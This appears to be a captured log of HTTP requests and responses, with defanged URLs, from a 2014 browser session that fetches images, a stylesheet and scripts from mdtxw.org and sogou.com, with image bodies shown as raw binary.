......o`...#?..........}C...7zn.8...g...r........7.w...c...''b./6,.P.`
.... I...........;[.;........0.S..Q.Z...b....O<)..I.).(....@5.$.Z.I
..s...z.s.m..l.......&.......5`..l.........>..J...!..b.{.{..Z.Y.R..
7d...G..._R(...=Q...'.o.l....U.z.Q."..m88..X...qi;....S..E.. )...(<<< skipped >>>

GET /miniindex/images/aaa7.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 24446

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:54 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:21:08....................
.........}...........~...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?.......\.......'..r~....N.....F...:
.......e..P4.....z6.tuf...c,n.j.N....Q.=..;<.'...X.....:.'A....:W@.
.0]s..V....G.......P.O.`|...2.ve..Ya;...a#-5)[email protected].. .......O.h.n
....i;M..s... c].....gfSsG.]#.5..|.K.a.X..!.c.:.O.....&.....~v....}i..
..r.}.u.>f..7m../.......\.r..II$..RS9 .*.'.M.g.J..S...J.Gu.32.I)...
.u<..k-;[.]...]o...9C9.Yok1\.q&...Z.....&...d ...r~..A.V.....K...%y
g....}1.... .}......~.......V...\KY..<.T9"j...ZOceX..h...@#.<..O
..j.syQ.F&.$.......&.K] ....W=.>.tN./..b.#[i..|l.......h....:L...W.
f}Y..X..2$:?;.aK....9. w..........O........]..1^....u.{3.l..z.....{...
v..kY;~.......4Y.cZ..:...X...........x"..i>.,p..6.`.O.c........<<< skipped >>>

GET /miniindex/images/aaa8.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 22801

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:54 GMT
......JFIF.....`.`......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:23:40....................
.........}...........~...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?....8.|.d[..[....."S...`..2H0EgQ...
]V.w.E.........,.!!.....K.W...]..._..m.#L...%..Sr...X^Y.io?.... .c....
.h.P...hx:....{>.=.3k...;.......6.m{=.{H.......l.J#QOU.....k..M_...
....V...t..`e...n....... .6...i.. ...V....'9'9........Cs.9.e.)w9Cv..r.
......&@......*..*.,.d..U.-qo..Lgb.sKO..}..x......r..W%. ..m....)..k~M
-...=....az=....d....c..K....3.$.7.A.?..;.f~....a.hm..n...^h.Ttnr.$.s.
.=......f...J....?..F."......q...p..8..q..{~..r?X.C.....~....(i._...w.
h...V.C.'h...?.w..c9...z......^sz.NNSi.t......).....B.n......>../..
Uuy.5....KgY....p. .5..?...s.[6"..I........C~.<....:..s.e:...#.c.%.
W..c.#.).P.|Rs.%=....M..'B.y....fz.eZm....S..r.J...~....O.l.~..S..<<< skipped >>>

GET /miniindex/images/aaa9.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 23028

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 09:29:12 GMT

Accept-Ranges: bytes

ETag: "0a4acfec357cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:54 GMT
......JFIF.....`.`.....DExif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................`.......`
....Adobe Photoshop CS Windows.2014:04:14 17:26:02....................
.........}...........~...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................~.}.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?...m/.'....s.........5n....?.T<x
...S [email protected].]..~.UC [email protected].\.)k..$..?....uln...
.}........N...v..(.. .%Oc.Ki............1.KA\.B.wQ..9.m.m .!....#s.|..
...G..3..o.........8}..c}m. v?P......A.H......PDvY.S.......t...M$v.LA.
.O3..0...c..6K.......u.P....v...>......[....X...lct..5....U.4..!..z
....z.....o.p..u<....u`4i. y=q...c.TX.....qY...}.,p,..p..J~(HkWi...
u....y..N....)p....^..._Q.fM\Z. vt/%.....H8...l.......Wv>G.lt2..N..
....'e..5kO....O..6..2[..d\....o...k..G...... ..A~...^..X.)s.Hm.p-=.n.
............{L.q..........t..r5...........b......i.y*A..(.%..xR.ap....
[email protected](L..p;........a..........gHu}...>>.....ZX.$...<<< skipped >>>

GET /miniindex/images/b13.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 42296

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 07:47:34 GMT

Accept-Ranges: bytes

ETag: "0affbcbb557cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:55 GMT
......JFIF.....H.H.....[Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 15:47:34....................
.................................................................&.(..
...............................%.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..8........~.........A...^ ..6.i...
.....gf.m#X......:.`........5..........*.[cg71.\]..'.sO.....:m.H....{.
r....Ob.H....e...,x.@.%.......[..-=.<=...2A...2}...=...Z.....kI.?.P
{.s..eOi<..IL)..Z...?...mi..i.((..E.....{QI..4.~W...9......l..\#...
e....m.y;t". ecn.....u..W...cfD.l..p%X....Yfb,..v5..<9..:Dr%B...{.i
[email protected]#S.......`...G?I....P...P).#!d0...F.:W...m.6......I.V.
...40...Z.. ...O.o...........%.......TI.*.v.....Y...%...5..}?Y....h,.o
;.....)n.5...t2u.5....-..k@-....$.F.v..J....'Yk.O..]*.-.X]..4.......a*
....E... .....S~g...,.D4=WF$..uL,.[n.......i"=.\._N.O.p....H.O.......u
..T-...*....$......*hv%./..;.^....A.??.. ._.#h.......>......U.}<<< skipped >>>

GET /miniindex/images/b14.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40898

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 07:49:40 GMT

Accept-Ranges: bytes

ETag: "0c21517b657cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:55 GMT

......JFIF.....H.H..... Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 15:49:39....................
.................................................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?.....N%.....Dj...V}../t.}..../...*.
KH.\7W.7t..9..>...............u............v..e. 8.......u~.....?..
... .Y[...m5...5..^.c..7{.......q>...[...'.....7.Y.....L.........L.
..K..8...).K.....:.........&..'....\.j.E.....G.-g2.t-...h....SE8....g.
.N.0..t...tQe.)....tm...k. .......ur>.....Lhm..[.#MWB.2K W>>.
?r.......v.=..D...`....S...}^..V..b.u.c.V..2.j&......=..\}.....Vh..G.k
mc...H./N..T.....m~...l;..i..r,kE..\.......3].....?..?1.c.8......e....
.j.DJ.....=......B.....z.G...62.X...4.......*wu....mk...~j..'.. .q.w.&
gt;. .4..9.>....W.F.o..'.i.y&.../c.P.K..gN..~T..2...D.LsOhU.gtB....
@.x.UNY*&.P..US...pn..W4...u[...b.<[email protected]

<<< skipped >>>

GET /miniindex/images/b15.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 38304

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 07:58:46 GMT

Accept-Ranges: bytes

ETag: "0bf865cb757cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:56 GMT
......JFIF.....H.H.....>Exif..MM.*.............................b...
........j.(...........1.........r.2...........i.................H.....
..H....Adobe Photoshop CS Windows.2014:04:14 15:58:46.................
....................................................................&.
(.........................................H.......H..........JFIF.....
H.H......Adobe_CM......Adobe.d........................................
......................................................................
...................................f...."................?............
..............................................................3......!
.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'..
.............Vfv........7GWgw........................5.....!1..AQaq"..
2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F............
...Vfv........'7GWgw.................?....Ny)*..Jb..RS..T..IH.....%...
......=l..i<.......{..?z......w..2...{}...........'.S..-..e_b6XH!..
....WzV{..jt...............?Q.6N.rn........W..?X...t....)m7. .Iq.....7
.s.....h..S,"fk.]].#E...$...X.).r....1R*%%1L.S$.....d.UY.....6..A.i..m
{....z.:..Y....l,.`k.C...3.Qg.........oV...g...........MZ..{.a........
.Z....... y..fQc3k.%......67_.....clg. A.~...A.(b2<W.d..."=.bTJ)...
?r....?qR.<...K.........4.k...]7.:.v.......nf.=..]F{.02K.`T.dx4.n..
....".w..GVD...h.D...2..3..>;/...."@.........)~=N...{@.{...=..w.!.7
..Y.....vz.eU....V...s_.s....N{)....S0.W;.>..;~....v.&V...fc./g.k`.
f..q.z..'.*x.~.j1.YHt.....ng `....D.K^/SQ1R*%\s.*%H..T..).b....$..<<< skipped >>>

GET /miniindex/images/b17.jpg HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 40997

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:05:38 GMT

Accept-Ranges: bytes

ETag: "0f51852b857cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:56 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:05:37....................
.................................................................&.(..
...............................{.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................f...."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..uM...[O |T.......=;h.<..O...F.
....x..R.x}...8.>.xG...'i...2;.1.R.3.>...ILt.I.?"....V.......a..
.. .US~..].kr)$../k\..J1.$.t...:mG%...K..z. z...e....=.....u*..,[.T...
.w[E..Z.....p_VG........X...m.... .....v..q..q....Tv...73w.u..@f...,xG
.yk......S1.k....7G.v............R.h5....;......C....)....&....}...j..
....k}`U0m..~.....o."..H_v.......<.L%.`.I;.Q...lo...Q.!...C.......q
.....g.F.)aE.r.../...t|.g.!1.D..?uF\u!.....h.....t......#.).O...G.Q2u.
........P$p....O..#.RB..@.....>T......xG."Q.}.2...l..u...8.....s...
.3z.h...q......\...o...UM.u.....O..3.}[ki...U./........?....H...xB...[
.........K....w.....(.C.|...c..8....-..U........v..Wn.g....s=oQ{.v<<< skipped >>>

GET /miniindex/images/b18.JPG HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 23977

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:14:46 GMT

Accept-Ranges: bytes

ETag: "01fbb98b957cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:56 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:14:46....................
.........l...........A...........................................&.(..
.......................................H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................A.l.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?..w=.Ku vX...~U..p.iM.....ec...'r..
...g.:...N.e.].^...v=O?E.7}t..%..i.8.C...D.t.a...%...........?$.-.k...
.F...K{~sTs....4........].d/L3...N..R<...T.2F2......;..nt..Y..4....
W.....C|..;.}z......H.. o.a...K}.z.I........X...CuN..w}N..5..o..`...k.
......7...?GN....-.;[email protected].'.|.8...#,....8&v.a.Ay......
?=....W.W......KA.}.WG..W[.:.u.....^K....4h...........5..->.\d.....
.R..L..w.... G....q.....)......W.,..2..l........52..g}..L..?[..O..Sg.?
......}......G.X....C..f.N...b6}/..#..xA..`....u.>O...,..4...y..v5.
Y]...RK...t..R....].y..M...>.. .c?7.2...n{..Y.CI..O....f.g..l..."h.
.....5/[email protected]..^...u.;...1..........kk.[.j.......3<<< skipped >>>

GET /miniindex/images/b19.JPG HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/xinwen.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 20701

Content-Type: image/jpeg

Last-Modified: Mon, 14 Apr 2014 08:17:59 GMT

Accept-Ranges: bytes

ETag: "8095c4bba57cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:57 GMT
......JFIF.....H.H......Exif..MM.*.............................b......
.....j.(...........1.........r.2...........i.................H.......H
....Adobe Photoshop CS Windows.2014:04:14 16:17:58....................
.........l...........A...........................................&.(..
...............................\.......H.......H..........JFIF.....H.H
......Adobe_CM......Adobe.d...........................................
......................................................................
................................A.l.."................?...............
...........................................................3......!.1.
AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE..t6..U.e.....u..F'.....
..........Vfv........7GWgw........................5.....!1..AQaq"..2..
...B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te......u..F...............
Vfv........'7GWgw.................?....mS...0..........z../i....F..Z.-
.....u.!.`......Hy...G...Cu.a.i.^........k..w.y/S..?).Y$.......f..E...
...z.P{..1.-..Ak.....e.o......2[......8..~...'S.-P.n...~....U. .o...5.
......]}.w..?n{.(#I..6.w..?K..gO.....qc-i.........;..........g. .4i.A.
......V.R.nf#..N..:;...r...L.....V..o...p.V.......} ...<:.K\.V.5.-.
]k...c[i..j......E.._P..F..f.v..P...ysH..;...g........d..E.l.a,s{.....
.......8..-..7E....8..?......I.-..S..#.2...{.er..5...n........._...c?k
...o.>........n\....V.`4.Y.y.{O^.....a.k.....;........^...#.b6..?i.
;....;.....BG.2e...=^w.e;[email protected]=.h[.z...(.L....{..z....o..4,...
.9,...e....N.........Ocoq>......T<VI..........df6..N8....q..<<< skipped >>>

GET /miniindex/inc/style.css HTTP/1.1

Accept: */*

Referer: hXXp://VVV.mdtxw.org/miniindex/meinv.htm?time=undefined

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: VVV.mdtxw.org

Connection: Keep-Alive


HTTP/1.1 200 OK

Content-Length: 3717

Content-Type: text/css

Last-Modified: Thu, 10 Apr 2014 16:40:38 GMT

Accept-Ranges: bytes

ETag: "0c7479adb54cf1:420"

Server: Microsoft-IIS/6.0

Who: ShanIE

Date: Sun, 01 Jun 2014 03:33:57 GMT
*{margin:0px;padding:0px;}..html,body {overflow: hidden;}..body {font:
 12px/18px Simsun, Helvetica, Arial, sans-serif; text-align: center; f
ont-size-adjust: none; font-stretch: normal;}..ul ,li{list-style: none
;}..a {color: rgb(51, 51, 51); text-decoration: none;}..a:hover {color
: rgb(189, 10, 1); text-decoration: underline;}..a,img{border:0px;}...
focus_filter {left: 0px; width: 100%; text-align: center; bottom: 0px;
 display: block; position: absolute; z-index: 3; cursor: pointer;}...f
ocus_filter {background: rgb(0, 0, 0); height: 21px; z-index: 1; opaci
ty: 0.6; -moz-opacity: 0.6;}...main {background: rgb(255, 255, 255); p
adding: 14px 0px 0px 14px; width: 509px; height: 352px; text-align: le
ft; float: left; position: relative; -ms-zoom: 1;}...main_left {backgr
ound: rgb(255, 255, 255); width: 222px; overflow: hidden; padding-righ
t: 20px; float: left;}...product_yl .list_news_yl1 {padding: 4px 0px; 
margin-bottom: 3px; border-bottom-color: rgb(139, 140, 140); border-bo
ttom-width: 1px; border-bottom-style: dotted;}...mod_left {margin-top:
 10px;}...list_pic {width: 222px; overflow: hidden; -ms-zoom: 1;}...li
st_pic ul {width: 232px;}...list_pic li {margin-right: 10px; float: le
ft;}...list_pic li a {padding: 2px; border: 1px solid rgb(221, 223, 22
2); width: 100px; float: left;}...list_pic li a img {width: 100px; hei
ght: 65px;}...list_pic li a span {height: 19px; text-align: center; pa
dding-top: 6px; display: block; cursor: pointer;}...list_pic li a:hove
r {text-decoration: none;}...list_pic li a:hover img {text-decorat<<< skipped >>>

GET /jsn/hotdata.js?V=1401576016368 HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: 123.sogou.com

Connection: Keep-Alive

Cookie: ipt=0; SDUV=1401576016258_7438_00001; CKOR=7763_00001_00000; CKOD=1371_00000_00000; GOTO=Af22014


HTTP/1.1 200 OK

Server: nginx

Date: Sun, 01 Jun 2014 03:33:26 GMT

Content-Type: application/x-javascript; charset=gbk

Transfer-Encoding: chunked

Connection: keep-alive

Last-Modified: Sat, 31 May 2014 14:19:19 GMT

Set-Cookie: IPLOC=CA; path=/

P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

Expires: Wed, 04 Jun 2014 03:33:26 GMT

Cache-Control: max-age=259200

Content-Encoding: gzip
c3f.............YkO.I../D.v.....jX...y0$...H4.............=.V...`.....
....>..[.t.H'........3.....o;..l.K.2.k.....Y3..L.Z..2;...#.P...x=..
../......y.|.8.......E.k..]............O?.....:N..../?.....5"u.U......
./x8..k^..F'_E...b....7]...C........zo.....~.....U..4.go.\..........D.
V..5...?..&9~{s=..f.w.s{....7'.G.....Yz..zg..V....WJ.)..e.......^.....
i.M....x.......Go ....f....*.xO.Y!5^ck..W...t./8.~.....^s..l.bm.le..W.
.....*C. ...i.X,.......=...`..|..FZ..6.NT^.~....@......;OU-.........O.
..zg.)&.)..2.;........u...3y8..|T.F>..\T;....'.No...Qt.G....... .FX
e0...L......1;......Qq....d...jP.F..Vx.kQ...............Et.DNF..JI...H
..(B.).,e.........c%..%I9][.....Y....~...$.R(...E.p.h/b~V..$J.cJ..-U.x
.|.L*......A..^o6..'k.9..M....U.; Cq..c]..p>...:OS....h.|.|...@@g-.
..2HN....P`......xU.mY.....q.U...........O.......t.....U...W`GA.Y...LW
.....!....#..ET?.j.....L.&.ea...H.SaO..........}..vF..QHz....J...xN{.&
..B.h. ,W....7.......iOD.r......K...Y..u..9'...NZ..gSN.r......I.7....R
h...$.._.W.._k...B.r.2Ka.......$Jf.Z.......3)*....R..d....^.E,.*.3....
.M<.R.?....N.]Q.V.Z.5jQ.F..4m...........K.b.>..O.f...$...ITkD...
!&.Dj.l.M(l.j.7h\..F.u.A...:.<.o=.C.....U.....fe^..1...........4D.p
.....B5..K1.Ax.?.._.GDB.pp...36.../I.;[email protected]@...;.\H.z<...\.
tCP.k.&8f7.$...!6....r..sAU..%..N...IxY..-reT.D.`.*..GN..D. b(.\...( .
..;.m.1.N.d....9<Qn.6 [email protected].. ...5...#./[email protected]...].z.3
)...si.,%.f....f...d?..Q.D....8...'.Z)$..E\.O.....m.`......P.h.8.Z....
.#..v...........|.H$.W9......q.!*...X..h........n....f.L N.hfk.. .<<< skipped >>>

GET /imgn/v51/new-erweima2.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p3.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:27 GMT

Content-Type: image/png

Content-Length: 18683

Last-Modified: Mon, 08 Jul 2013 10:16:12 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:27 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR...,...,........"..H.IDATx....x.U..'.R.D.Q....*...]A.;
".".... 5$.%....I.=....^............?.I\2w.,......'..\....;..s....D...
...H.!.D..H$..D".I$.AH"..$.. $..B.... ...tuu..lcc..=.....}.6v.....S.wb
aa..Dv..[$.|..!.=..9.....d....;......[?w..M..'.l....[.....d.....U.. $.
.B.. $..B.. $..B.. $..B.. $......AH..!|....t.....:.?......c........gi.
....:::.s.p........{^.j.....~X..B1!...g..|.r.9..;W........J......yx>
;>>.sdB.....T..I.bgm.......~.Mu......V.....j....P4.d.........4n.
MEK..1...5.tjjj............O^.h.....F.<..:...!AH....!AH....!AH....!
A.~......yE.H.....!Ax..v..d..............j....U....*.%x..{d:.:.B.._vv.
........."l..$.......OSS...g....y..'......l......rrr..z.@(..3..T<.]
.B......!CT.Ph.d.U. ...2....,.p.....@$::Z.........x.T<A<..!AH...
[email protected].........(.....,l.k.
...7z..N.P^....O.....2R.!.qGA(..$.;.Y.........w[...C........l.qI....,!
AH....!AH.>x..t.@(..!Te%aGA...".....!..QY..Z....5..d....%$..B.. $..
B....N..[o.....^b6.>|.(.._..K?..#[email protected]...={V..
......VVV2/..o.).AOO.y....#?.}l.;Y.V. ...=L._...bqL'..Q*.W..3......J%.
..(AH....!AH....!AH....!AH....!A.i.".....i....G.yDx.......f.....m.....
[email protected].......]]]...N.y...P.ekx.T|P........B.....LK...
......X.....~...b......!AH....!AH....!AH....!AH....!AH....6.C....s...*
....k......2...7O....Lu.?....,..9Sx..b.tv...P.C.F...c....7..y......6l.
6...e6f..|....c(...N~P.F'A.E..A.X..:.(....'T*[email protected]..]G.!AH....!AH.
...!AH....!AH........n..<W.c...c.....&..w1.....{V....;.= .)hjjz<<< skipped >>>

GET /imgn/sehome/tjv1/img-news.gif HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p3.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/gif

Content-Length: 225

Last-Modified: Fri, 11 Jan 2013 08:57:48 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
GIF89a................................................................
.......................................!.......,..........^...dY"I"(..
.pl...$.0.|..6... .P..c..1....psF..TbZM......M${[email protected]
%.fD...)..#.!.;....


GET /imgn/v51/i-ico-2b.png HTTP/1.1

Accept: */*

Referer: hXXp://123.sogou.com/?22014

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; TheWorld)

Host: p3.123.sogoucdn.com

Connection: Keep-Alive


HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sun, 01 Jun 2014 03:33:32 GMT

Content-Type: image/png

Content-Length: 2337

Last-Modified: Thu, 30 May 2013 07:28:54 GMT

Connection: keep-alive

Expires: Tue, 01 Jul 2014 03:33:32 GMT

Cache-Control: max-age=2592000

Accept-Ranges: bytes
.PNG........IHDR..._...X......I M....sBIT....|.d.....pHYs.........B.4.
....tEXtSoftware.Adobe FireworksO..N....tEXtCreation Time.12/28/12...5
...}IDATx...{l[...?..y4MH.'$kIXJIE.H.^K.2...d06p.44.m.4..tb....m...ib.
.aM.....Tk......#{....P......m.&n..}}...ul...~..J.G..{..]..=?...>..
.HlA.......F..6"...K....^lG.#.#_6@..)...(.9.|...#g..E9...,Gr._._\,././
>.rm.6.$.F..6"...)..H.m..........,G2.5[...w...0.. .UX..pi.....O...;
